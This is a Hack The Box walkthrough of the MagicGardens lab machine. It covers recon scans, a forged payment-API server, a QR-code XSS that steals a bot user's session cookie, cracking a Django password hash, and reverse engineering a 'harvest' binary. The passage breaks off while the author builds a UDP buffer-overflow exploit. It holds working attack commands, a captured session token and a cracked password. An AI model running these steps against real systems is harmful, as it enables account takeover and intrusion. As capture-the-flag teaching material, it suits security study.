Hackthebox: MagicGardens

Foued SAIDI Lv4

Overview

MagicGardens is an insane-difficulty machine from Hack The Box. It deals initially with a phishing attack that will trigger and XSS vulnerability through crafting a malicious QR Code which gives us access to a Django Administrator admin account where we’ll crack a password an land a shell on the Morty user. Later we’ll be reverse engineering a Network Monitoring tool named Harvest in order to trigger a BoF vulnerability and get access to user flag. Finally we’ll be utilizing a cool Docker Escape Technique which will lead us to creating and injecting a custom Kernel module to escape the Docker container and land a root shell.

MagicGardens-info-card
MagicGardens-info-card

Reconnaissance

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
PS C:\Users\0xkujen> nmap -A -Pn 10.129.41.157
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-23 15:43 W. Central Africa Standard Time
NSOCK ERROR [0.2650s] ssl_init_helper(): OpenSSL legacy provider failed to load.

Nmap scan report for 10.129.231.24
Host is up (0.12s latency).
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 e072624899334ffc59f86c0559dba77b (ECDSA)
|_ 256 62c6357e823eb10f9b6f5beafec5859a (ED25519)
25/tcp filtered smtp
80/tcp open http nginx 1.22.1
|_http-title: Did not follow redirect to http://magicgardens.htb/
|_http-server-header: nginx/1.22.1
5000/tcp open ssl/http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=AU
| Not valid before: 2023-05-23T11:57:43
|_Not valid after: 2024-05-22T11:57:43
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=9/23%OT=22%CT=1%CU=32132%PV=Y%DS=2%DC=T%G=Y%TM=66F17F0
OS:B%P=i686-pc-windows-windows)SEQ(SP=105%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A
OS:)SEQ(CI=Z%II=I)OPS(O1=M54EST11NW7%O2=M54EST11NW7%O3=M54ENNT11NW7%O4=M54E
OS:ST11NW7%O5=M54EST11NW7%O6=M54EST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W
OS:5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M54ENNSNW7%CC=Y%Q=)T1(R=Y%DF=Y
OS:%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%
OS:T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD
OS:=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE
OS:(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT ADDRESS
1 186.00 ms 10.10.16.1
2 70.00 ms 10.129.231.24

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.68 seconds

We’ve got a web app running on port 80 that’s redirecting us towards magicgardens.htb (which we’ll add to our /etc/hosts file) and a Docker instance running on port 5000.

Directory Bruteforcing using FeroxBuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
PS C:\Users\0xkujen\Tools> feroxbuster.exe -u http://magicgardens.htb

___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.8.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://magicgardens.htb
🚀 Threads │ 50
📖 Wordlist │ .\SecLists\Discovery\Web-Content\raft-medium-directories.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.8.0
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
WLD - - - - http://magicgardens.htb => auto-filtering 404-like response (179 bytes); toggle this behavior by using --dont-filter
301 GET 0l 0w 0c http://magicgardens.htb/admin => http://magicgardens.htb/admin/
301 GET 0l 0w 0c http://magicgardens.htb/register => http://magicgardens.htb/register/
301 GET 0l 0w 0c http://magicgardens.htb/logout => http://magicgardens.htb/logout/
200 GET 458l 1853w 30861c http://magicgardens.htb/
301 GET 0l 0w 0c http://magicgardens.htb/login => http://magicgardens.htb/login/
301 GET 0l 0w 0c http://magicgardens.htb/catalog => http://magicgardens.htb/catalog/
301 GET 0l 0w 0c http://magicgardens.htb/search => http://magicgardens.htb/search/
301 GET 0l 0w 0c http://magicgardens.htb/cart => http://magicgardens.htb/cart/
301 GET 0l 0w 0c http://magicgardens.htb/profile => http://magicgardens.htb/profile/
WLD - - - - http://magicgardens.htb/admin => auto-filtering 404-like response (0 bytes); toggle this behavior by using --dont-filter
🚨 Caught ctrl+c 🚨 saving scan state to ferox-http_magicgardens_htb-1727963765.state ...
[>-------------------] - 3s 683/270000 22m found:9 errors:0
[>-------------------] - 3s 360/30000 107/s http://magicgardens.htb/
[>-------------------] - 2s 104/30000 37/s http://magicgardens.htb/admin/
[>-------------------] - 2s 54/30000 18/s http://magicgardens.htb/register/
[>-------------------] - 2s 104/30000 38/s http://magicgardens.htb/logout/
[>-------------------] - 2s 41/30000 14/s http://magicgardens.htb/login/
[>-------------------] - 2s 4/30000 1/s http://magicgardens.htb/search/
[--------------------] - 0s 0/30000 0/s http://magicgardens.htb/catalog/
[--------------------] - 0s 0/30000 0/s http://magicgardens.htb/cart/
[--------------------] - 0s 0/30000 0/s http://magicgardens.htb/profile/

We have 2 seperate login portals: One under http://magicgardens and one under http://magicgardens.htb/admin

Web Application - http://magicgardens.htb

Web Application
Web Application

We can simply go ahead and create an account for ourselves:

Web Application
Web Application

Looking at some of the features related to our account, we can upgrade our account to become a premium one:

Web Application
Web Application

Now we’d have to be choosing our bank and entering our data:

Web Application
Web Application

What I’ll do now is interecpt the request being sent and see what we have on our hands:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
POST /subscribe/ HTTP/1.1
Host: magicgardens.htb
Content-Length: 186
Cache-Control: max-age=0
Origin: http://magicgardens.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Sec-GPC: 1
Accept-Language: en-US,en;q=0.5
Referer: http://magicgardens.htb/profile/?tab=subscription&action=upgrade
Accept-Encoding: gzip, deflate, br
Cookie: csrftoken=sAhvqc8HoIxuKSPHwLDwKxUDJJl0mBEf; sessionid=.eJxFyTEKgDAMQFGXioUexMnLeAAJtlCtVmgSnAQPkDHeV9HBvz3-aa5UfR3aSsMYSoY1qJjEc8gqNRIQo0rTE2QPxavYfcI4LBOSSqXiXo4bZwpFYy12hELff-Re_Zu7G852LCE:1tgfE0:coGRcCNwNZvcyW9Sb52AMHvk6PcgoDVP99GWSmSmt8U
Connection: keep-alive

csrfmiddlewaretoken=nSe8s8pfkR5MeSnqTtPCDPiOfqzTFFU5FiltIanMyps6OA2Xf4iYdc2hOZKJR6oa&bank=honestbank.htb&cardname=kujen&cardnumber=1111-2222-3333-4444&expmonth=april&expyear=2026&cvv=352

So we’ll be making a request where the bank field has the value honestbank.htb, let’s try to change that to our local address and see what sort of requests we’re getting:

1
2
3
4
PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.41.157 - - [08/Feb/2025 08:20:45] code 501, message Unsupported method ('POST')
::ffff:10.129.41.157 - - [08/Feb/2025 08:20:45] "POST /api/payments/ HTTP/1.1" 501 -

Well this is interesting: the server is making a request to the bank we chose honestbank.htb (which we now changed to our own local server) to specifically a /api/payments endpoint. One more thing to add, is that the result of our request is this:

Web Application
Web Application

And after waiting for a few seconds, we get a rejection:

Web Application
Web Application

So I will create a local web server with a /api/payments endpoint and see whats going on:

1
2
3
4
5
6
7
8
9
10
11
12
13
from flask import Flask, jsonify, request

app = Flask(__name__)

@app.route('/api/payments/', methods=['POST'])
def sleepisgood():
req_json = request.get_json()
req_json['status'] = "200"
print(req_json)
return jsonify(req_json)

if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=True)

And we got it! Alongside the json data that’s being passed:

1
2
3
4
5
6
7
8
9
10
11
12
13
PS C:\Users\0xkujen> python3 .\server.py
* Serving Flask app 'server'
* Debug mode: on
WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on all addresses (0.0.0.0)
* Running on http://127.0.0.1:80
* Running on http://192.168.1.21:80
Press CTRL+C to quit
* Restarting with stat
* Debugger is active!
* Debugger PIN: 119-575-313
{'cardname': 'kujen', 'cardnumber': '1111-2222-3333-4444', 'expmonth': 'april', 'expyear': '2026', 'cvv': '352', 'amount': 25, 'status': '200'}
10.129.41.157 - - [08/Feb/2025 08:27:38] "POST /api/payments/ HTTP/1.1" 200 -

And now after validating our poyment method, we have become a premium member:

Web Application
Web Application

Now let’s process that QR code and see what it has:

QR Code
QR Code

Seems like some sort of ID for us.

Now what we can do is go ahead and buy something from the store, we get this:

Web Application
Web Application

And after a few seconds I get an email for Morty:

Web Application
Web Application

This seems like a phishing attacks that’ll lead us to perform an XSS and get Morty’s access.
So I’ll be crafting a QR code based off of the previous QR code result:

QR Code
QR Code

Now I’ll send it to Morty and just wait:

Web Application
Web Application

And we get a hit!

1
2
3
PS C:\Users\0xkujen> python3 -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:10.129.231.24 - - [08/Feb/2025 09:05:21] "GET /?Y3NyZnRva2VuPUtubVBoTXJWdGpEcnlxenlPRUpNMlZmZjVhelh2MGhYOyBzZXNzaW9uaWQ9LmVKeE5qVTFxd3pBUWhaTkZRZ01waFp5aTNRaExsdU5vVjdydnFnY3draXhGYmhNSjlFUHBvdEFEekhKNjN6cHVBcDdkOTc3SG01X1Y3MjY1bU80YkgtR3VKQk85UEJ1RTFUbkVfSVd3VGxubWtzYmdMVXRyRVRhZlEzTGRhVWdaWVlHd25WQ0g0ck9KNk5hdzBUTG1mel9TZHFLWnZ1OWt5YTY3UE9xR0htSEpFSGF6VEVuOVlmd29udnAzNlktQjZPQnpIQlM1Vk1qVkp2SWFlbk42dVhVZlpnTk9Kb2Z3VEJ0dG1XMEZyVTNWY0diTWdXbFJLY1dwdElJeTJSeXFmYTF0MC1vOVZZcXB5ckNhRzA2MWFtdXVoY0JDX2dEZXMyWDc6MXRnZnhiOm95dGZKVlNmY3BmVmxZWkFOYU1hTGoxdDRveVVIVnpQeDRRTEV1Y0lDZE0= HTTP/1.1" 200 -

This decodes to:

1
2
csrftoken=KnmPhMrVtjDryqzyOEJM2Vff5azXv0hX; 
sessionid=.eJxNjU1qwzAQhZNFQgMphZyi3QhLluNoV7rvqgcwkixFbhMJ9EPpotADzHJ63zpuAp7d977Hm5_V7265mO4bH-GuJBO9PBuE1TnE_IWwTlnmksbgLUtrETafQ3LdaUgZYYGwnVCH4rOJ6Naw0TLmfz_SdqKZvu9kya67POqGHmHJEHazTEn9Yfwonvp36Y-B6OBzHBS5VMjVJvIaenN6uXUfZgNOJofwTBttmW0FrU3VcGbMgWlRKcWptIIy2Ryqfa1t0-o9VYqpyrCaG061amuuhcBC_gDes2X7:1tgfxb:oytfJVSfcpfVlYZANaMaLj1t4oyUHVzPx4QLEucICdM

Let’s get into morty’s account now:

Web Application
Web Application

And we’re in!!

Web Application - http://magicgardens.htb/admin

Remember that admin panel from our initial recon? Let’s get into it now:

Admin Panel
Admin Panel

This is a Django administration website.

Looking at our stored users, and especially Morty we find something interesting:

Admin Panel
Admin Panel

It’s a password hash for morty, let’s crack it!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
┌──(kali㉿kali)-[~/Desktop]
└─$ hashcat -m 10000 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu-sandybridge-AMD Ryzen 7 4800H with Radeon Graphics, 2212/4489 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
* Slow-Hash-SIMD-LOOP

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -w 3 to the commandline.
This can cause your screen to lag.

* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework

pbkdf2_sha256$600000$y7K056G3KxbaRc40ioQE8j$e7bq8dE/U+yIiZ8isA0Dc0wuL0gYI3GjmmdzNU+Nl7I=:jonasbrothers

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 10000 (Django (PBKDF2-SHA256))
Hash.Target......: pbkdf2_sha256$600000$y7K056G3KxbaRc40ioQE8j$e7bq8dE...+Nl7I=
Time.Started.....: Sat Feb 8 09:13:51 2025 (1 min, 25 secs)
Time.Estimated...: Sat Feb 8 09:15:16 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 26 H/s (7.92ms) @ Accel:32 Loops:1024 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 2176/14344385 (0.02%)
Rejected.........: 0/2176 (0.00%)
Restore.Point....: 2048/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:599040-599999
Candidate.Engine.: Device Generator
Candidates.#1....: slimshady -> telefon
Hardware.Mon.#1..: Util: 92%

Started: Sat Feb 8 09:13:50 2025
Stopped: Sat Feb 8 09:15:17 2025

And we get our password:
pbkdf2_sha256$600000$y7K056G3KxbaRc40ioQE8j$e7bq8dE/U+yIiZ8isA0Dc0wuL0gYI3GjmmdzNU+Nl7I=:jonasbrothers

Let’s get an ssh session as morty now:

1
2
3
morty@magicgardens:~$ id
uid=1001(morty) gid=1001(morty) groups=1001(morty)
morty@magicgardens:~$

Looking at running processes, we find an interesting process used by alex:

1
alex        1836  0.0  0.0   2464   884 ?        S    02:45   0:00 harvest server -l /home/alex/.harvest_logs

We can find the binary on the system:

1
2
morty@magicgardens:~$ find / -name harvest 2> /dev/null
/usr/local/bin/harvest
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
morty@magicgardens:~$ harvest

██░ ██ ▄▄▄ ██▀███ ██▒ █▓▓█████ ██████ ▄▄▄█████▓
▓██░ ██▒▒████▄ ▓██ ▒ ██▒▓██░ █▒▓█ ▀ ▒██ ▒ ▓ ██▒ ▓▒
▒██▀▀██░▒██ ▀█▄ ▓██ ░▄█ ▒ ▓██ █▒░▒███ ░ ▓██▄ ▒ ▓██░ ▒░
░▓█ ░██ ░██▄▄▄▄██ ▒██▀▀█▄ ▒██ █░░▒▓█ ▄ ▒ ██▒░ ▓██▓ ░
░▓█▒░██▓ ▓█ ▓██▒░██▓ ▒██▒ ▒▀█░ ░▒████▒▒██████▒▒ ▒██▒ ░
▒ ░░▒░▒ ▒▒ ▓▒█░░ ▒▓ ░▒▓░ ░ ▐░ ░░ ▒░ ░▒ ▒▓▒ ▒ ░ ▒ ░░
▒ ░▒░ ░ ▒ ▒▒ ░ ░▒ ░ ▒░ ░ ░░ ░ ░ ░░ ░▒ ░ ░ ░
░ ░░ ░ ░ ▒ ░░ ░ ░░ ░ ░ ░ ░ ░
░ ░ ░ ░ ░ ░ ░ ░ ░ ░


harvest v1.0.3 - Remote network analyzer

Usage: harvest <command> [options...]

Commands:
server run harvest in server mode
client run harvest in client mode

Options:
-h show this message
-l <file> log file
-i <interface> capture packets on this interface

Example:
harvest server -i eth0
harvest client 10.10.15.212

Please, define mode

morty@magicgardens:~$

I’ll download the binary to my system and have a look at it.
Firstly from what I understood, harvest runs as a network packet capture server on the specified network interface and the client connects to harvest server to relay some sort of network data.

First I’ll be taking a look at the handshake that’s happening between the server and the client:

Harvest
Harvest

At first, the handshake will be compared. If it’s correct, the monitoring will start.
However, the handshake starts with harvest v, and there are some numbers or letter after it:

1
2
3
4
5
6
7
if ( !strcmp(s, buf) )
{
v4 = strlen(s);
write(a1, s, v4);
puts("[*] Successful handshake");
return 1LL;
}

In conclusion, s is a string that gets manipulated and compared with the contents of buf. s1 is essentially a pointer to s, and s2 is a pointer to the buf string. The code is checking if s (through s1) and buf (through s2) are equal using _strcmp.

I’ll fire up gdb alongside gef python extension and see what we got.
I’ll first disassemble the server handshake function:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
kujen@kujen:~$ gdb ./harvest
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
GEF for linux ready, type `gef' to start, `gef config' to configure
93 commands loaded and 5 functions added for GDB 15.0.50.20240403-git in 0.00ms using Python engine 3.12
Reading symbols from ./harvest...

This GDB supports auto-downloading debuginfo from the following URLs:
<https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in ./harvest)
gef➤ disassemble harvest_handshake_server
Dump of assembler code for function harvest_handshake_server:
0x0000000000001b54 <+0>: push rbp
0x0000000000001b55 <+1>: mov rbp,rsp
0x0000000000001b58 <+4>: sub rsp,0x90
0x0000000000001b5f <+11>: mov DWORD PTR [rbp-0x84],edi
0x0000000000001b65 <+17>: mov QWORD PTR [rbp-0x90],rsi
0x0000000000001b6c <+24>: lea rax,[rbp-0x80]
0x0000000000001b70 <+28>: pxor xmm0,xmm0
0x0000000000001b74 <+32>: movaps XMMWORD PTR [rax],xmm0
0x0000000000001b77 <+35>: movaps XMMWORD PTR [rax+0x10],xmm0
0x0000000000001b7b <+39>: movaps XMMWORD PTR [rax+0x20],xmm0
0x0000000000001b7f <+43>: movaps XMMWORD PTR [rax+0x30],xmm0
0x0000000000001b83 <+47>: lea rcx,[rbp-0x80]
0x0000000000001b87 <+51>: mov eax,DWORD PTR [rbp-0x84]
0x0000000000001b8d <+57>: mov edx,0x40
0x0000000000001b92 <+62>: mov rsi,rcx
0x0000000000001b95 <+65>: mov edi,eax
0x0000000000001b97 <+67>: call 0x1110 <read@plt>
0x0000000000001b9c <+72>: lea rax,[rbp-0x40]
0x0000000000001ba0 <+76>: pxor xmm0,xmm0
0x0000000000001ba4 <+80>: movaps XMMWORD PTR [rax],xmm0
0x0000000000001ba7 <+83>: movaps XMMWORD PTR [rax+0x10],xmm0
0x0000000000001bab <+87>: movaps XMMWORD PTR [rax+0x20],xmm0
0x0000000000001baf <+91>: movaps XMMWORD PTR [rax+0x30],xmm0
0x0000000000001bb3 <+95>: lea rax,[rbp-0x40]
0x0000000000001bb7 <+99>: movabs rcx,0x2074736576726168
0x0000000000001bc1 <+109>: mov QWORD PTR [rax],rcx
0x0000000000001bc4 <+112>: mov WORD PTR [rax+0x8],0x76
0x0000000000001bca <+118>: lea rax,[rbp-0x40]
0x0000000000001bce <+122>: mov rdi,rax
0x0000000000001bd1 <+125>: call 0x10b0 <strlen@plt>
0x0000000000001bd6 <+130>: lea rdx,[rbp-0x40]
0x0000000000001bda <+134>: add rdx,rax
0x0000000000001bdd <+137>: mov rax,QWORD PTR [rbp-0x90]
0x0000000000001be4 <+144>: mov rsi,rax
0x0000000000001be7 <+147>: mov rdi,rdx
0x0000000000001bea <+150>: call 0x1040 <strcpy@plt>
0x0000000000001bef <+155>: lea rax,[rbp-0x40]
0x0000000000001bf3 <+159>: mov rdi,rax
0x0000000000001bf6 <+162>: call 0x10b0 <strlen@plt>
0x0000000000001bfb <+167>: lea rdx,[rbp-0x40]
0x0000000000001bff <+171>: add rax,rdx
0x0000000000001c02 <+174>: mov WORD PTR [rax],0xa
0x0000000000001c07 <+179>: lea rdx,[rbp-0x80]
0x0000000000001c0b <+183>: lea rax,[rbp-0x40]
0x0000000000001c0f <+187>: mov rsi,rdx
0x0000000000001c12 <+190>: mov rdi,rax
0x0000000000001c15 <+193>: call 0x1130 <strcmp@plt>
0x0000000000001c1a <+198>: test eax,eax
0x0000000000001c1c <+200>: je 0x1c5d <harvest_handshake_server+265>
0x0000000000001c1e <+202>: lea rax,[rip+0x1ba2] # 0x37c7
0x0000000000001c25 <+209>: mov rdi,rax
0x0000000000001c28 <+212>: call 0x1050 <puts@plt>
0x0000000000001c2d <+217>: mov eax,DWORD PTR [rbp-0x84]
0x0000000000001c33 <+223>: mov edx,0x15
0x0000000000001c38 <+228>: lea rcx,[rip+0x1b9c] # 0x37db
0x0000000000001c3f <+235>: mov rsi,rcx
0x0000000000001c42 <+238>: mov edi,eax
0x0000000000001c44 <+240>: call 0x1080 <write@plt>
0x0000000000001c49 <+245>: mov eax,DWORD PTR [rbp-0x84]
0x0000000000001c4f <+251>: mov edi,eax
0x0000000000001c51 <+253>: call 0x1100 <close@plt>
0x0000000000001c56 <+258>: mov eax,0x0
0x0000000000001c5b <+263>: jmp 0x1c94 <harvest_handshake_server+320>
0x0000000000001c5d <+265>: lea rax,[rbp-0x40]
0x0000000000001c61 <+269>: mov rdi,rax
0x0000000000001c64 <+272>: call 0x10b0 <strlen@plt>
0x0000000000001c69 <+277>: mov rdx,rax
0x0000000000001c6c <+280>: lea rcx,[rbp-0x40]
0x0000000000001c70 <+284>: mov eax,DWORD PTR [rbp-0x84]
0x0000000000001c76 <+290>: mov rsi,rcx
0x0000000000001c79 <+293>: mov edi,eax
0x0000000000001c7b <+295>: call 0x1080 <write@plt>
0x0000000000001c80 <+300>: lea rax,[rip+0x1b69] # 0x37f0
0x0000000000001c87 <+307>: mov rdi,rax
0x0000000000001c8a <+310>: call 0x1050 <puts@plt>
0x0000000000001c8f <+315>: mov eax,0x1
0x0000000000001c94 <+320>: leave
0x0000000000001c95 <+321>: ret
End of assembler dump.
gef➤

Here we got the addresses of our two variables:

1
2
3
0x0000000000001c0f <+187>:   mov    rsi,rdx
0x0000000000001c12 <+190>: mov rdi,rax
0x0000000000001c15 <+193>: call 0x1130 <strcmp@plt>

First I’ll set my breakpoints and args:

1
2
3
4
5
6
7
gef➤  break *0x555555555c0f
Breakpoint 1 at 0x555555555c0f
gef➤ break *0x555555555c12
Breakpoint 2 at 0x555555555c12
gef➤ set args server
gef➤

Now I’ll listen for incoming traffic and see the result of my comparison:

Harvest
Harvest

We can see that its comparing the version to 1.0.3 which is the harvest version we’re alreay working with.

So now I’ll send our harvest v1.0.3 string to the server and see what happens:

Harvest
Harvest

And we got a handshake!

Buffer Overflow

Now checking the code that handles raw packets:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
__int64 __fastcall handle_raw_packets(int a1, int a2, __int64 a3)
{
char *v3; // rax
__int64 result; // rax
char dest[10]; // [rsp+2Eh] [rbp-10072h] BYREF
time_t timer; // [rsp+38h] [rbp-10068h] BYREF
char v8[32]; // [rsp+40h] [rbp-10060h] BYREF
char v9[32]; // [rsp+60h] [rbp-10040h] BYREF
_BYTE s[14]; // [rsp+80h] [rbp-10020h] BYREF
__int16 v11; // [rsp+8Eh] [rbp-10012h] BYREF
int v12; // [rsp+1008Ch] [rbp-14h]
__int16 *v13; // [rsp+10090h] [rbp-10h]
unsigned int v14; // [rsp+1009Ch] [rbp-4h]

memset(s, 0, 0xFFFFuLL);
v14 = recvfrom(a1, s, 0xFFFFuLL, 0, 0LL, 0LL);
timer = time(0LL);
v3 = ctime(&timer);
strncpy(dest, v3 + 11, 8uLL);
dest[8] = 0;
if ( v14 <= 0x27 )
{
puts("Incomplete packet ");
close(a1);
exit(0);
}
v13 = &v11;
v12 = 255;
sprintf(v9, "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x", s[6], s[7], s[8], s[9], s[10], s[11]);
sprintf(v8, "%.2x:%.2x:%.2x:%.2x:%.2x:%.2x", v12 & s[0], v12 & s[1], v12 & s[2], v12 & s[3], v12 & s[4], v12 & s[5]);
if ( *(_BYTE *)v13 == 69 )
print_packet((_DWORD)v13, a3, a2, (unsigned int)v9, (unsigned int)v8, (unsigned int)dest, (__int64)s);
result = *(unsigned __int8 *)v13;
if ( (_BYTE)result == 96 )
return log_packet(v13, a3);
return result;
}

We can see that if the IP is IPv6, it would show suspicious content, and then record it to a file.

This is the code for logging packets:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
__int64 __fastcall log_packet(__int64 a1, const char *a2)
{
uint16_t v3; // [rsp+1Eh] [rbp-FF82h]
char format[65360]; // [rsp+20h] [rbp-FF80h] BYREF
char dest[40]; // [rsp+FF70h] [rbp-30h] BYREF
FILE *stream; // [rsp+FF98h] [rbp-8h]

v3 = htons(*(_WORD *)(a1 + 4));
if ( v3 )
{
strcpy(dest, a2);
strncpy(format, (const char *)(a1 + 60), v3);
*(_WORD *)&format[v3] = 10;
stream = fopen(dest, "w");
if ( stream )
{
fprintf(stream, format);
fclose(stream);
puts("[!] Suspicious activity. Packages have been logged.");
}
else
{
puts("Bad log file");
}
}
return 0LL;
}

And the IPv4 addresses are allowed.

Let’s test the BOF now. I will write a small code that establishes a UDP connection to the local IPv6 server (::1 on port 1338) and then send my BOF data to it:

1
2
3
4
5
6
7
8
import socket

server_address = ('::1',1338)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(server_address)
data = b'A'*65500
s.send(data)

We can see that a lot of AAAAA written locally, which means that we really have a BOF:

Harvest
Harvest

Now the tricky part is to figure out where the file name will be in the payload, that’s why I’ll use msf-pattern_create because it will give me a unique strings so I’ll be able to determine indexes:
msf-pattern_create -l 65500 > bof

Harvest
Harvest

And now we have our filename: Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy

Now if we try to find this string inside our msf-generated payload we’d find 4 occurances because that’s just how msf does it (by repeating trunks of the data):

1
2
3
4
5
6
7
┌──(kali㉿kali)-[~]
└─$ msf-pattern_offset -q Fu8F -l 65500
[*] Exact match at offset 4524
[*] Exact match at offset 24804
[*] Exact match at offset 45084
[*] Exact match at offset 65364

We can keep testing and eventually we’ll get that the offset we’re looking for is 65364. So let’s modify our script:

Harvest
Harvest

And the filename was successfully written.

Now I’ll have to find-tune the code a bit to ensure that the filename is correctly written.
We slightly increased the offset to 65372 to ensure that our filename string fit within the expected memory region.
This ensured that the filename was properly terminated and didn’t interfere with surrounding data.
The newline (\r) was placed correctly, preventing parsing issues:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~]
└─$ cat code.py
import socket

server_address = ('::1',1338)
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(server_address)
data=''
